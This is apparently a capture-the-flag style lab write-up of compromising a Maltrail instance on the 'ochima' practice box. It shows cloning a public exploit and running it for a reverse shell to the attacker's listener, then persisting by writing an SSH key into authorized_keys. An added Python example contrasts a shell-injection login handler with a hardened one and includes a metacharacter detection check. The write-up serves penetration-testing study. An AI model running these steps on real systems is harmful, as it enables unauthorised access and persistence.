RCE


The target Maltrail instance suffers from an OS command injection vulnerability

Exploit


Found an exploit online

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/ochima]
└─$ git clone https://github.com/spookier/Maltrail-v0.53-Exploit
Cloning into 'Maltrail-v0.53-Exploit'...
remote: Enumerating objects: 17, done.
remote: Counting objects: 100% (17/17), done.
remote: Compressing objects: 100% (12/12), done.
remote: Total 17 (delta 4), reused 9 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (17/17), 4.44 KiB | 4.44 MiB/s, done.
Resolving deltas: 100% (4/4), done.

Cloning the exploit repo to Kali

Exploitation


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/ochima]
└─$ python3 Maltrail-v0.53-Exploit/exploit.py $tun0 8338 http://$IP:8338
Running exploit on http://192.168.201.32:8338/login

Executing the exploit

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/ochima]
└─$ nnc 8338
listening on [any] 8338 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.201.32] 55742
$ whoami
whoami
snort
$ hostname
hostname
ochima
$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:f4:84 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    inet 192.168.201.32/24 brd 192.168.201.255 scope global ens160
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the snort user by exploiting the OS command injection vulnerability in the target Maltrail instance
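To show where this bug class comes from and how it is closed, here is an added Python example (not code from this writeup, the exploit repo or Maltrail itself): a login handler that hands the submitted username to a shell, the same handler rewritten without a shell, and a validation check a defender can run over submitted usernames. The vulnerable function is an illustration of the injection pattern in general and is an assumption, not a claim about Maltrail's actual source.

```python
import subprocess

# Characters that only carry meaning to a shell; a legitimate username
# has no business containing any of them.
SHELL_METACHARS = set(";|&`$()<>\n'\"")


def log_failed_login_vulnerable(username: str) -> str:
    """Illustrative vulnerable pattern (assumption, not Maltrail's code):
    the username is interpolated into a shell command line and run with
    shell=True. The single quotes are not a defense once the username
    contains its own quote character."""
    cmd = "echo 'Failed password for %s'" % username
    return subprocess.check_output(cmd, shell=True, text=True)


def log_failed_login_fixed(username: str) -> str:
    """Hardened form: no shell at all. The username travels as a single
    argv element, so shell metacharacters inside it are just characters."""
    return subprocess.check_output(
        ["echo", "Failed password for %s" % username], text=True)


def looks_like_injection(username: str) -> bool:
    """Defender-side check for input validation or web-log review:
    flag usernames that carry shell metacharacters."""
    return any(ch in SHELL_METACHARS for ch in username)


if __name__ == "__main__":
    # Constructed input: closes the quoted string, appends a harmless
    # command and comments out the trailing quote.
    payload = "bob';echo INJECTED #"
    print(log_failed_login_vulnerable(payload))  # appended echo runs
    print(log_failed_login_fixed(payload))       # payload printed literally
    print(looks_like_injection(payload))         # True
    print(looks_like_injection("snort"))         # False
```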

SSH


$ mkdir -p ~/.ssh ; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' > ~/.ssh/authorized_keys
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/ochima]
└─$ ssh snort@$IP                             
The authenticity of host '192.168.201.32 (192.168.201.32)' can't be established.
ED25519 key fingerprint is SHA256:EcFUQ3abooLm3ZmBChJ1yx8VqJ5nj/Htk22+PfBdxUo.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:176: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.201.32' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Sun Apr  6 05:53:42 PM UTC 2025
 
  System load:  0.0               Processes:               238
  Usage of /:   62.2% of 9.75GB   Users logged in:         0
  Memory usage: 15%               IPv4 address for ens160: 192.168.201.32
  Swap usage:   0%
 
 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.
 
   https://ubuntu.com/blog/microk8s-memory-optimisation
 
Expanded Security Maintenance for Applications is not enabled.
 
51 updates can be applied immediately.
30 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
 
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
 
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
$ 

SSH session established